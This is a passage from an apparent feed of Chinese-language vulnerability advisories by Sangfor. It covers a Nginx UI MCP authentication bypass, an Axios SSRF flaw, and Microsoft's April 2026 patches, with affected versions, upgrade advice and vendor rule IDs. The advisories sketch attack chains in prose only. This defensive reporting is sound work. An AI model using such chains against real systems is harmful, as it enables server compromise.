<综合评定利用难度>:中等,需要配合其他漏洞才能执行代码。

<综合评定威胁等级>:高危,能导致服务器失陷。

官方解决方案:

已发布

漏洞分析

组件介绍

Nginx UI 是一款开源的、基于 Web 的图形化管理工具,旨在通过直观的界面彻底简化 Nginx 服务器的配置与管理 。它采用 Go 和 Vue 构建,将原本需要通过命令行进行的复杂操作,如管理虚拟主机、配置反向代理、实时监控服务器状态(CPU、内存等)以及在线查看日志,都迁移到了浏览器中完成。

漏洞简介

2026年4月16日,深瞳漏洞实验室监测到一则Nginx UI组件存在绕过认证漏洞的信息,漏洞编号:CVE-2026-33032,漏洞威胁等级:高危。

Nginx UI 的 /mcp_message 接口存在鉴权缺陷,仅做了白名单检验(且默认配置白名单为空),未授权的攻击者可以利用脆弱接口建立 MCP 会话。配合 CVE-2026-27944 获取 node_secret 可以执行任意命令。注意:该漏洞已发现在野利用。

影响范围

目前受影响的Nginx UI版本:

Nginx UI ≤ 2.3.5

解决方案

官方修复建议

官方已发布最新版本修复该漏洞,建议受影响用户将 Nginx UI 更新到 2.3.6 版本。
下载链接:https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.6

临时修复建议

  • 关闭未使用的功能模块,减少潜在攻击入口。

  • 遵循最小权限原则,严控各类敏感操作权限范围。

  • 非必要不暴露服务到公网,限制访问源为可信范围。

  • 定期更新系统及各类组件至安全版本,及时修补已知隐患。

深信服解决方案

1、漏洞安全监测

支持对Nginx UI MCP接口绕过认证漏洞(CVE-2026-33032)的监测,可依据流量收集实时监控业务场景中的受影响资产情况,快速检查受影响范围,相关产品及服务如下:

【深信服安全感知管理平台SIP】预计2026年04月24日发布监测方案,规则ID:11228014。

【深信服安全托管服务MSS】预计2026年04月24日发布监测方案(需要具备SIP组件能力),规则ID:11228014。

【深信服可拓展检测响应平台XDR】预计2026年04月24日发布监测方案,规则ID:11228014。

2、漏洞安全防护

支持对Nginx UI MCP接口绕过认证漏洞(CVE-2026-33032)的防御,可阻断攻击者针对该事件的入侵行为,相关产品及服务如下:

【深信服下一代防火墙AF】预计2026年04月24日发布防护方案,规则ID:11228014。

【深信服Web应用防火墙WAF】预计2026年04月24日发布防护方案,规则ID:11228014。

【深信服安全托管服务MSS】预计2026年04月24日发布防护方案(需要具备AF组件能力),规则ID:11228014。

【深信服可拓展检测响应平台XDR】预计2026年04月24日发布防护方案(需要具备AF组件能力),规则ID:11228014。

参考链接

时间轴

2026/04/16

深瞳漏洞实验室监测到Nginx UI MCP接口绕过认证漏洞信息。

2026/04/17

深瞳漏洞实验室发布漏洞通告。

点击阅读原文,及时关注并登录深信服智安全平台,可轻松查询漏洞相关解决方案。

阅读原文

跳转微信打开

]]> Fri, 17 Apr 2026 16:37:00 +0800 【漏洞通告】Axios SSRF漏洞 (CVE-2026-40175) https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&mid=2247525339&idx=1&sn=aaab6e4838ba21ae6ebb1cfa6018c207 2026年4月14日,深瞳漏洞实验室监测到一则Axios组件存在服务器端伪造请求(SSRF)漏洞的信息,漏洞编号:CVE-2026-40175,漏洞威胁等级:严重。 深瞳漏洞实验室 2026-04-15 19:40 北京

2026年4月14日,深瞳漏洞实验室监测到一则Axios组件存在服务器端伪造请求(SSRF)漏洞的信息,漏洞编号:CVE-2026-40175,漏洞威胁等级:严重。

漏洞名称:

Axios SSRF漏洞 (CVE-2026-40175)

组件名称:

Axios

影响范围:

Axios < 1.15.0

漏洞类型:

服务器端伪造请求(SSRF)

利用条件:

1、用户认证:不需要用户认证

2、前置条件:默认配置

3、触发方式:远程

综合评价:

<综合评定利用难度>:容易,能造成敏感信息泄露。

<综合评定威胁等级>:严重,结合 AWS IMDSv2 绕过可导致远程代码执行。

官方解决方案:

已发布

漏洞分析

组件介绍

Axios 是一个基于 Promise 的 HTTP 客户端,可在浏览器和 Node.js 环境中运行,用于向后端 API 发送异步请求,支持请求/响应拦截、数据转换、自动 JSON 处理等特性,是目前前端开发中最流行的 HTTP 请求库。

漏洞简介

2026年4月14日,深瞳漏洞实验室监测到一则Axios组件存在服务器端伪造请求(SSRF)漏洞的信息,漏洞编号:CVE-2026-40175,漏洞威胁等级:严重。

Axios 1.15.0 版本之前存在一个SSRF漏洞,未授权的攻击者可以构造畸形的HTTP结构发送至非预期目标,导致敏感信息泄露。

影响范围

目前受影响的Axios版本:

Axios < 1.15.0

解决方案

官方修复建议

官方已发布最新版本修复该漏洞,建议受影响用户将Axios更新到 1.15.0 及以上版本。
下载链接:https://github.com/axios/axios/releases/tag/v1.15.0

临时修复建议

  • 关闭未使用的功能模块,减少潜在攻击入口。

  • 遵循最小权限原则,严控各类敏感操作权限范围。

  • 非必要不暴露服务到公网,限制访问源为可信范围。

  • 定期更新系统及各类组件至安全版本,及时修补已知隐患。

深信服解决方案

1、风险资产发现

支持对Axios的主动检测,可批量检出业务场景中该事件的受影响资产情况,相关产品如下:

【深信服云镜YJ】 已发布资产检测方案,指纹ID:0032399。

【深信服漏洞评估工具TSS】已发布资产检测方案,指纹ID:0032399。

2、漏洞主动检测

支持对Axios SSRF漏洞 (CVE-2026-40175)的主动检测,可批量快速检出业务场景中是否存在漏洞风险,相关产品如下:

【深信服云镜YJ】预计2026年04月19日发布检测方案,规则ID:SF-2026-00875。

【深信服可拓展检测响应平台XDR】预计2026年04月19日发布检测方案(需要具备云镜组件能力),规则ID:SF-2026-00875。

3、漏洞安全监测

支持对Axios SSRF漏洞 (CVE-2026-40175)的监测,可依据流量收集实时监控业务场景中的受影响资产情况,快速检查受影响范围,相关产品及服务如下:

【深信服安全感知管理平台SIP】预计2026年04月24日发布监测方案,规则ID:11228011。

【深信服安全托管服务MSS】预计2026年04月24日发布监测方案(需要具备SIP组件能力),规则ID:11228011。

【深信服可拓展检测响应平台XDR】预计2026年04月24日发布监测方案,规则ID:11228011。

4、漏洞安全防护

支持对Axios SSRF漏洞 (CVE-2026-40175)的防御,可阻断攻击者针对该事件的入侵行为,相关产品及服务如下:

【深信服下一代防火墙AF】预计2026年04月24日发布防护方案,规则ID:11228011。

【深信服Web应用防火墙WAF】预计2026年04月24日发布防护方案,规则ID:11228011。

【深信服安全托管服务MSS】预计2026年04月24日发布防护方案(需要具备AF组件能力),规则ID:11228011。

【深信服可拓展检测响应平台XDR】预计2026年04月24日发布防护方案(需要具备AF组件能力),规则ID:11228011。

参考链接

时间轴

2026/04/14

深瞳漏洞实验室监测到Axios SSRF漏洞信息。

2026/04/15

深瞳漏洞实验室发布漏洞通告。

点击阅读原文,及时关注并登录深信服智安全平台,可轻松查询漏洞相关解决方案。

阅读原文

跳转微信打开

]]> Wed, 15 Apr 2026 19:40:00 +0800 微软补丁日安全通告|4月份 https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&mid=2247525339&idx=2&sn=f5d9f09c0128dbbf80d8f2a51f0ea2a5 2026年4月15日(北京时间),微软发布了2026年4月安全更新,共发布了247个CVE的补丁程序,比上月增多了154个。 深瞳漏洞实验室 2026-04-15 19:40 北京

2026年4月15日(北京时间),微软发布了2026年4月安全更新,共发布了247个CVE的补丁程序,比上月增多了154个。

在漏洞安全等级方面,存在10个标记等级为“Critical”的漏洞,187个漏洞被标记为“Important/High”等级的漏洞; 在漏洞类型方面,主要有62个远程代码执行漏洞,93个权限提升漏洞以及25个信息泄露漏洞。

漏洞数据分析

2026年漏洞数量趋势

图 1 近一年微软补丁漏洞修复情况

总体上来看,微软本月发布的补丁数量为247个,有10个 Critical 漏洞补丁。

千里目安全技术中心在综合考虑往年微软公布漏洞数量的数据统计和今年的特殊情况,初步估计微软在今年五月份公布的漏洞数将比今年四月份少。漏洞数量将会维持在100个左右。

历史微软补丁日4月漏洞对比

2023-2026年,4月份的漏洞数趋势如下图:

图 2 微软近年4月Windows补丁漏洞数量对比

2023-2026年,4月份的漏洞危险等级趋势和数量如下图:

图 3 微软近年4月漏洞危险等级对比

2023-2026年,4月份的漏洞各个类型数量对比如下图:

图 4 微软近年4月漏洞类型对比

数据来源:根据微软官方安全更新通告中的数据统计

  • 从漏洞数量来看,今年相较去年增多。微软在2026年4月份爆发的漏洞相较于去年增多。本月出现了247个漏洞补丁,并且有10个 Critical 类型的漏洞补丁。

  • 从漏洞的危险等级来看,相较去年“Critical”等级的漏洞数量减少,“Important/High”等级的漏洞数量增多。本月出现了10个“Critical”等级的漏洞,相较去年减少了约9%;本月出现了187个“Important/High”等级的漏洞,相较去年增多了约67%。

  • 从漏洞类型来看,RCE类型的漏洞数量增多,DoS类型的漏洞数量减少,EoP类型的漏洞数量增多,需要引起高度重视,尤其是RCE漏洞在配合社工手段的前提下,甚至可以直接接管整个局域网并进行进一步扩展攻击。

重要漏洞分析

漏洞分析

Microsoft SharePoint Server 欺骗漏洞 CVE-2026-32201

Microsoft SharePoint Server 是微软推出的企业级协作与内容管理平台,为企业提供文档管理、协作站点、搜索服务、工作流与权限管理等核心服务,广泛应用于各类企业门户、文档中心与业务流程平台,负责处理非结构化与结构化内容、保障协作效率与访问安全。

其中存在欺骗漏洞,攻击者可以利用该漏洞在网络上实施欺骗攻击,可能诱导用户访问恶意站点或泄露敏感信息。经过评估,该漏洞已被发现用于实际攻击,危害较大,我们建议用户及时更新微软安全补丁。

Microsoft Defender权限提升漏洞 CVE-2026-33825

Microsoft Defender 是微软推出的终端安全防护系统,为企业提供恶意软件防护、实时检测、漏洞管理、攻击面减少与权限管理等核心安全服务,广泛应用于各类 Windows 业务系统、服务器与云工作负载,负责检测与阻断威胁、保障系统完整性与访问安全。

其中存在权限提升漏洞,攻击者可以利用该漏洞在目标系统获取更高权限。经过评估,该漏洞危害较大,我们建议用户及时更新微软安全补丁。

影响范围

漏洞名称、CVE编号

受影响版本

Microsoft SharePointServer欺骗漏洞
CVE-2026-32201

Microsoft SharePoint Server Subscription Edition
Microsoft SharePoint Server 2019
Microsoft SharePoint Enterprise Server 2016

Microsoft Defender权限提升漏洞
CVE-2026-33825

Microsoft Defender Antimalware Platform

解决方案

官方修复建议

微软官方已更新受影响软件的安全补丁,用户可根据不同系统版本下载安装对应的安全补丁,安全更新链接如下:

1、https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32201

2、https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33825

参考链接

时间轴

2026/4/15

微软例行补丁日,微软官网发布漏洞安全公告。

2026/4/15

深信服千里目安全技术中心发布安全通告。

点击阅读原文,及时关注并登录深信服智安全平台,可轻松查询漏洞相关解决方案。

阅读原文

跳转微信打开

]]> Wed, 15 Apr 2026 19:40:00 +0800